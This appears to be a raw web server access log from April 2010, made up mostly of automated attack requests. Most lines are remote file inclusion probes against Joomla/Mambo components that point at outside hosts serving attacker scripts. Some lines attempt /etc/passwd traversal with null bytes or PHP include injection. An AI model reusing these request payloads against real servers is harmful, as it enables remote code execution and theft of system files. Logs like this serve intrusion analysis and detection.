116.122.36.61 - - [16/Apr/2010:01:34:06 -0400] "GET /logs/access_log.Q110031400%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:34:06 -0400] "GET /logs//////com_mospray/scripts/admin.php?basedir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:01:35:03 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0151085A07517500CB6B092+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.121.24.1 - - [16/Apr/2010:01:35:53 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:35:53 -0400] "GET /logs/error_log.Q109091800%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:35:53 -0400] "GET /logs/error_log.Q110040100%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:35:53 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:36:03 -0400] "GET ///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:36:03 -0400] "GET /logs///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:36:03 -0400] "GET /logs/access_log.Q109081500///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:36:29 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:36:29 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:36:29 -0400] "GET /logs/error_log.Q109091800%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:36:29 -0400] "GET /logs/error_log.Q110040100%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:01:38:15 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:01:38:15 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 46449 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:01:38:15 -0400] "GET /logs/access_log.Q110021100////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:01:38:22 -0400] "GET /logs/error_log.Q110021100////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:38:24 -0400] "GET /logs/error_log.Q109091800%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:38:24 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:38:24 -0400] "GET /logs/error_log.Q110040100%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:38:24 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:38:25 -0400] "GET /logs/error_log.Q110040100%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:38:25 -0400] "GET /logs/error_log.Q109091800%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:38:25 -0400] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:38:25 -0400] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:40:04 -0400] "GET //com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:40:04 -0400] "GET /logs//com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:40:04 -0400] "GET /logs/access_log.Q109062900//com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:40:07 -0400] "GET /logs//com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:40:07 -0400] "GET //com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:40:10 -0400] "GET /logs/access_log.Q109062900%20%20//com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:40:32 -0400] "GET /logs/access_log.Q109062900//com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:40:32 -0400] "GET //com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:40:32 -0400] "GET /logs//com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:01:40:43 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L12170B564F049500F260092+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.78.238.157 - - [16/Apr/2010:01:40:53 -0400] "GET /logs/error_log.Q110040600%20%20//com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:01:41:26 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:01:41:26 -0400] "GET /logs/access_log.Q109081500//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:01:41:26 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:41:33 -0400] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:41:33 -0400] "GET /logs/access_log.Q110010400//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:41:33 -0400] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:41:33 -0400] "GET /logs/error_log.Q110010400//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:42:01 -0400] "GET /logs/error_log.Q110010400%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:42:01 -0400] "GET /logs/access_log.Q110010400%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:01:42:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.182 - - [16/Apr/2010:01:42:09 -0400] "GET /logs/access_log.Q109081500%20%20///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:42:33 -0400] "GET /logs/error_log.Q110030800%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:42:41 -0400] "GET /logs/access_log.Q110031400%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:42:49 -0400] "GET /logs/access_log.Q110030900%20%20///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:43:05 -0400] "GET /logs/error_log.Q110040500%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:43:05 -0400] "GET /logs/access_log.Q110030800%20%20//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:01:43:22 -0400] "GET /logs/error_log.Q109062900 HTTP/1.0" 200 3131493 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.241.251.224 - - [16/Apr/2010:01:43:46 -0400] "GET /logs/access_log.Q110030700%20%20////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:01:43:53 -0400] "GET /logs/error_log.Q110021100%20%20////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:44:01 -0400] "GET /logs/error_log.Q109092300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:44:01 -0400] "GET /logs/access_log.Q110021000//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:44:04 -0400] "GET /logs/error_log.Q109092300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:44:04 -0400] "GET /logs/access_log.Q110021000//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
119.235.18.119 - - [16/Apr/2010:01:44:18 -0400] "GET ///index.php?option=com_custompages&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
200.78.238.157 - - [16/Apr/2010:01:44:34 -0400] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:44:34 -0400] "GET /logs/access_log.Q110010400%20%20//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:44:34 -0400] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:44:40 -0400] "GET /logs/error_log.Q110010400%20%20//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:44:56 -0400] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:44:56 -0400] "GET /logs/access_log.Q110010400//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:44:56 -0400] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:44:57 -0400] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:44:57 -0400] "GET /logs/error_log.Q110010400//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:44:57 -0400] "GET /logs/access_log.Q110010400//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:44:57 -0400] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:01:45:45 -0400] "GET /logs/access_log.Q109081500%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:01:45:45 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:01:45:45 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.67.27 - - [16/Apr/2010:01:46:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L12170B564FC46500FA60092+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.47.182 - - [16/Apr/2010:01:46:56 -0400] "GET /logs/access_log.Q109081500///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:46:56 -0400] "GET /logs///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:46:56 -0400] "GET ///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:48:49 -0400] "GET /logs//////////com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:48:49 -0400] "GET //////////com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:48:49 -0400] "GET /logs/access_log.Q109100200//////////com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:49:24 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:49:24 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:49:24 -0400] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:49:35 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:49:35 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:49:35 -0400] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:01:50:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.40.30.37 - - [16/Apr/2010:01:50:46 -0400] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:50:57 -0400] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:51:43 -0400] "GET /logs/access_log.Q109102900%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:51:50 -0400] "GET /logs/access_log.Q109102900%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.249.67.27 - - [16/Apr/2010:01:52:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L12170B564F247500F360092+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
70.164.155.6 - - [16/Apr/2010:01:53:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.164.155.6 - - [16/Apr/2010:01:53:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.164.155.6 - - [16/Apr/2010:01:53:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
70.164.155.6 - - [16/Apr/2010:01:53:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
200.78.238.157 - - [16/Apr/2010:01:54:15 -0400] "GET //com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:54:15 -0400] "GET /logs//com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:54:15 -0400] "GET /logs/access_log.Q110030400//com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:54:26 -0400] "GET /logs/access_log.Q110010400//com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:55:15 -0400] "GET /logs//////////com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:55:26 -0400] "GET //////////com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:55:34 -0400] "GET /logs/access_log.Q109081500%20%20///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:56:08 -0400] "GET /logs/access_log.Q110040200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:56:08 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:56:08 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:56:09 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:56:09 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:56:09 -0400] "GET /logs/access_log.Q110040200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:56:14 -0400] "GET /logs/access_log.Q109100200//////////com_uhp/uhp_config.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:56:35 -0400] "GET /logs/access_log.Q110040200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:56:35 -0400] "GET /logs/access_log.Q110040200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
119.235.18.119 - - [16/Apr/2010:01:56:49 -0400] "GET ///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
66.249.67.232 - - [16/Apr/2010:01:57:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L12170B564F74D500FA60092+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [16/Apr/2010:01:58:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.182 - - [16/Apr/2010:01:58:08 -0400] "GET /logs/access_log.Q110030900%20%20///////////components/com_mambowiki/%20MamboLogin.php?IP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:58:28 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:58:28 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:58:28 -0400] "GET /logs/access_log.Q110040100%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:58:35 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
